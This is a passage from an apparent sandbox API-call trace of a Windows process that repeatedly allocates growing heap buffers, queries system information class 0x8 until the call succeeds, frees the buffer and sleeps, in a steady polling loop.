hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.109] Sleep (dwMilliseconds=0x110) [0228.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.126] Sleep (dwMilliseconds=0x110) [0228.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.208] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.209] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.209] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.212] Sleep (dwMilliseconds=0x110) [0228.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.271] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.272] Sleep (dwMilliseconds=0x110) [0228.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.378] Sleep (dwMilliseconds=0x110) [0228.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.450] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.452] Sleep (dwMilliseconds=0x110) [0228.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.542] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.543] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.543] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.543] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.546] Sleep (dwMilliseconds=0x110) [0228.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.571] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.572] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.573] Sleep (dwMilliseconds=0x110) [0228.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.577] Sleep (dwMilliseconds=0x110) [0228.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.601] Sleep (dwMilliseconds=0x110) [0228.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.616] Sleep (dwMilliseconds=0x110) [0228.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.630] Sleep (dwMilliseconds=0x110) [0228.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.644] Sleep (dwMilliseconds=0x110) [0228.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.657] Sleep (dwMilliseconds=0x110) [0228.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 